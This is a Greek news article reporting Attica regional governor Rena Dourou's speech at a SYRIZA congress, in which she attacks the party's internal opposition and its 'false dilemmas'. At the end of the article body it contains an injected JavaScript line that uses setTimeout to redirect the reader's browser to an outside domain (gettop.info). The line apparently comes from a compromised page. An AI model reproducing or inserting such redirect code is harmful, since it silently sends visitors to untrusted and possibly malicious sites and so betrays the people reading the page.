Πυρά Δούρου στoν «ΣΥΡΙΖΑ του 4%»

0
7

 

Κατά όσων θέτουν «ψευτοδιλήμματα» του 3% περί «ήττας» και «ιδεολογικής καθαρότητας» καταφέρθηκε η περιφερειάρχης Αττικής Ρένα Δούρου από το βήμα του συνεδρίου του ΣΥΡΙΖΑ, στοχεύοντας με τα λεγόμενά της την εσωκομματική αντιπολίτευση του κόμματος.

Μάλιστα υπονόησε ότι τα εν λόγω «ψευτοδιλήμματα» («Αριστερό success story, ή ήττα και απώλεια της ιδεολογικής μας ταυτότητας») τίθενται εκβιαστικά εν όψει των αυριανών καλπών. Μετά την περηφάνια της Πέμπτης πήρε τη σκυτάλη ο θυμός την Παρασκευή, ανέφερε, και «κανείς δε σχολίασε το φοβερό πολιτικό μανιφέστο του προέδρου«.

«Είναι άραγε δημοκρατία η πολυφωνία και ο καθένας να λέει ό,τι θέλει;» αναρωτήθηκε. Απέναντι στις «ερινύες» αντιπαρέβαλλε τις μάχες που δίνει η κυβέρνηση στην κοινωνική πολιτική για τις γυναίκες, τους μετανάστες κλπ. Χαρακτήρισε το τρέχον συνέδριο ιδρυτικό διότι όπως είπε καλείται να συζητήσει σοβαρά «τι κόμμα θέλουμε» και να απαντήσει σε όσα κρίσιμα ερωτήματα δεν απαντήθηκαν τα προηγούμενα χρόνια. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here